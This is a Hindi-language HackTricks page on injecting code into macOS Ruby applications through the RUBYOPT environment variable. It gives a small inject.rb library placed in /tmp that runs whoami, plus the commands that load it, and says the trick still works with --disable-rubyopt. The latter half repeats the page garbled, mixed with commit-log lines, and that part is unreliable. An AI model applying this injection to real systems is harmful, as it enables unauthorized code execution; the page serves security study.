hacktricks/macos-hardening/macos-security-and-privilege-escalation/macos-proces-abuse/macos-ruby-applications-injection.md

# macOS Ruby एप्लिकेशन्स इंजेक्शन

<details>

<summary><strong>AWS हैकिंग सीखें शून्य से लेकर हीरो तक</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong> के साथ!</strong></summary>

HackTricks का समर्थन करने के अन्य तरीके:

* यदि आप चाहते हैं कि आपकी **कंपनी का विज्ञापन HackTricks में दिखाई दे** या **HackTricks को PDF में डाउनलोड करें**, तो [**सब्सक्रिप्शन प्लान्स**](https://github.com/sponsors/carlospolop) देखें!
* [**आधिकारिक PEASS & HackTricks स्वैग**](https://peass.creator-spring.com) प्राप्त करें
* [**The PEASS Family**](https://opensea.io/collection/the-peass-family) की खोज करें, हमारा एक्सक्लूसिव [**NFTs**](https://opensea.io/collection/the-peass-family) का संग्रह
* 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) में **शामिल हों** या [**telegram group**](https://t.me/peass) में या **Twitter** पर मुझे 🐦 [**@carlospolopm**](https://twitter.com/carlospolopm) **का अनुसरण करें**.
* **HackTricks** के [**github repos**](https://github.com/carlospolop/hacktricks) और [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) में PRs सबमिट करके अपनी हैकिंग ट्रिक्स शेयर करें.

</details>

## RUBYOPT

इस env वेरिएबल का उपयोग करके जब भी **ruby** निष्पादित होती है तो उसमें **नए पैरामीटर्स जोड़ना** संभव है। हालांकि पैरामीटर **`-e`** का उपयोग ruby कोड निष्पादित करने के लिए नहीं किया जा सकता, पैरामीटर्स **`-I`** और **`-r`** का उपयोग करके लाइब्रेरीज के लोड पथ में एक नया फोल्डर जोड़ना और फिर **लोड करने के लिए एक लाइब्रेरी निर्दिष्ट करना** संभव है।

**`/tmp`** में लाइब्रेरी **`inject.rb`** बनाएं:

{% code title="inject.rb" %}
```ruby
puts `whoami`
```
{% endcode %}

कहीं भी एक रूबी स्क्रिप्ट बनाएं जैसे:

{% code title="hello.rb" %}
```ruby
puts 'Hello, World!'
```
{% endcode %}

फिर एक मनमानी रूबी स्क्रिप्ट बनाएं और इसे लोड करें:
```bash
RUBYOPT="-I/tmp -rinject" ruby hello.rb
```
मजेदार तथ्य, यह पैरामीटर **`--disable-rubyopt`** के साथ भी काम करता है:
```bash
RUBYOPT="-I/tmp -rinject" ruby hello.rb --disable-rubyopt
```
<details>

<summary><strong>शून्य से नायक तक AWS हैकिंग सीखें</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong> के साथ!</strong></summary>

HackTricks का समर्थन करने के अन्य तरीके:

* यदि आप चाहते हैं कि आपकी **कंपनी का विज्ञापन HackTricks में दिखाई दे** या **HackTricks को PDF में डाउनलोड करें**, तो [**सब्सक्रिप्शन प्लान्स**](https://github.com/sponsors/carlospolop) देखें!
* [**आधिकारिक PEASS & HackTricks स्वैग**](https://peass.creator-spring.com) प्राप्त करें
* [**The PEASS Family**](https://opensea.io/collection/the-peass-family) की खोज करें, हमारा विशेष [**NFTs**](https://opensea.io/collection/the-peass-family) संग्रह
* 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) में **शामिल हों** या [**telegram group**](https://t.me/peass) में या **Twitter** पर मुझे 🐦 [**@carlospolopm**](https://twitter.com/carlospolopm) **का पालन करें.**
* [**HackTricks**](https://github.com/carlospolop/hacktricks) और [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos में PRs सबमिट करके अपनी हैकिंग ट्रिक्स साझा करें।

</details>
Translated ['macos-hardening/macos-security-and-privilege-escalation/mac 2024-01-22 12:44:38 +00:00			`# macOS Ruby एप्लिकेशन्स इंजेक्शन`

			`<details>`

Translated ['generic-methodologies-and-resources/pentesting-wifi/README. 2024-02-02 14:20:12 +00:00			`<summary><strong>AWS हैकिंग सीखें शून्य से लेकर हीरो तक</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong> के साथ!</strong></summary>`
Translated ['macos-hardening/macos-security-and-privilege-escalation/mac 2024-01-22 12:44:38 +00:00
			`HackTricks का समर्थन करने के अन्य तरीके:`

			`* यदि आप चाहते हैं कि आपकी कंपनी का विज्ञापन HackTricks में दिखाई दे या HackTricks को PDF में डाउनलोड करें, तो [सब्सक्रिप्शन प्लान्स](https://github.com/sponsors/carlospolop) देखें!`
			`* [आधिकारिक PEASS & HackTricks स्वैग](https://peass.creator-spring.com) प्राप्त करें`
			`* [The PEASS Family](https://opensea.io/collection/the-peass-family) की खोज करें, हमारा एक्सक्लूसिव [NFTs](https://opensea.io/collection/the-peass-family) का संग्रह`
Translated ['generic-methodologies-and-resources/pentesting-wifi/README. 2024-02-02 14:20:12 +00:00			`* 💬 [Discord group](https://discord.gg/hRep4RUj7f) में शामिल हों या [telegram group](https://t.me/peass) में या Twitter पर मुझे 🐦 [@carlospolopm](https://twitter.com/carlospolopm) का अनुसरण करें.`
			`* HackTricks के [github repos](https://github.com/carlospolop/hacktricks) और [HackTricks Cloud](https://github.com/carlospolop/hacktricks-cloud) में PRs सबमिट करके अपनी हैकिंग ट्रिक्स शेयर करें.`
Translated ['macos-hardening/macos-security-and-privilege-escalation/mac 2024-01-22 12:44:38 +00:00
			`</details>`

			`## RUBYOPT`

Translated ['generic-methodologies-and-resources/pentesting-wifi/README. 2024-02-02 14:20:12 +00:00			इस env वेरिएबल का उपयोग करके जब भी ruby निष्पादित होती है तो उसमें नए पैरामीटर्स जोड़ना संभव है। हालांकि पैरामीटर `-e` का उपयोग ruby कोड निष्पादित करने के लिए नहीं किया जा सकता, पैरामीटर्स `-I` और `-r` का उपयोग करके लाइब्रेरीज के लोड पथ में एक नया फोल्डर जोड़ना और फिर लोड करने के लिए एक लाइब्रेरी निर्दिष्ट करना संभव है।
Translated ['macos-hardening/macos-security-and-privilege-escalation/mac 2024-01-22 12:44:38 +00:00
			`/tmp` में लाइब्रेरी `inject.rb` बनाएं:

			`{% code title="inject.rb" %}`
			```ruby
			puts `whoami`
			```
			`{% endcode %}`

			`कहीं भी एक रूबी स्क्रिप्ट बनाएं जैसे:`

			`{% code title="hello.rb" %}`
			```ruby
			`puts 'Hello, World!'`
			```
			`{% endcode %}`

Translated ['generic-methodologies-and-resources/pentesting-wifi/README. 2024-02-02 14:20:12 +00:00			`फिर एक मनमानी रूबी स्क्रिप्ट बनाएं और इसे लोड करें:`
Translated ['macos-hardening/macos-security-and-privilege-escalation/mac 2024-01-22 12:44:38 +00:00			```bash
			`RUBYOPT="-I/tmp -rinject" ruby hello.rb`
			```
Translated ['generic-methodologies-and-resources/pentesting-wifi/README. 2024-02-02 14:20:12 +00:00			मजेदार तथ्य, यह पैरामीटर `--disable-rubyopt` के साथ भी काम करता है:
Translated ['macos-hardening/macos-security-and-privilege-escalation/mac 2024-01-22 12:44:38 +00:00			```bash
			`RUBYOPT="-I/tmp -rinject" ruby hello.rb --disable-rubyopt`
			```
			`<details>`

Translated ['generic-methodologies-and-resources/pentesting-wifi/README. 2024-02-02 14:20:12 +00:00			`<summary><strong>शून्य से नायक तक AWS हैकिंग सीखें</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong> के साथ!</strong></summary>`
Translated ['macos-hardening/macos-security-and-privilege-escalation/mac 2024-01-22 12:44:38 +00:00
			`HackTricks का समर्थन करने के अन्य तरीके:`

Translated ['generic-methodologies-and-resources/pentesting-wifi/README. 2024-02-02 14:20:12 +00:00			`* यदि आप चाहते हैं कि आपकी कंपनी का विज्ञापन HackTricks में दिखाई दे या HackTricks को PDF में डाउनलोड करें, तो [सब्सक्रिप्शन प्लान्स](https://github.com/sponsors/carlospolop) देखें!`
			`* [आधिकारिक PEASS & HackTricks स्वैग](https://peass.creator-spring.com) प्राप्त करें`
			`* [The PEASS Family](https://opensea.io/collection/the-peass-family) की खोज करें, हमारा विशेष [NFTs](https://opensea.io/collection/the-peass-family) संग्रह`
			`* 💬 [Discord group](https://discord.gg/hRep4RUj7f) में शामिल हों या [telegram group](https://t.me/peass) में या Twitter पर मुझे 🐦 [@carlospolopm](https://twitter.com/carlospolopm) का पालन करें.`
			`* [HackTricks](https://github.com/carlospolop/hacktricks) और [HackTricks Cloud](https://github.com/carlospolop/hacktricks-cloud) github repos में PRs सबमिट करके अपनी हैकिंग ट्रिक्स साझा करें।`
Translated ['macos-hardening/macos-security-and-privilege-escalation/mac 2024-01-22 12:44:38 +00:00
			`</details>`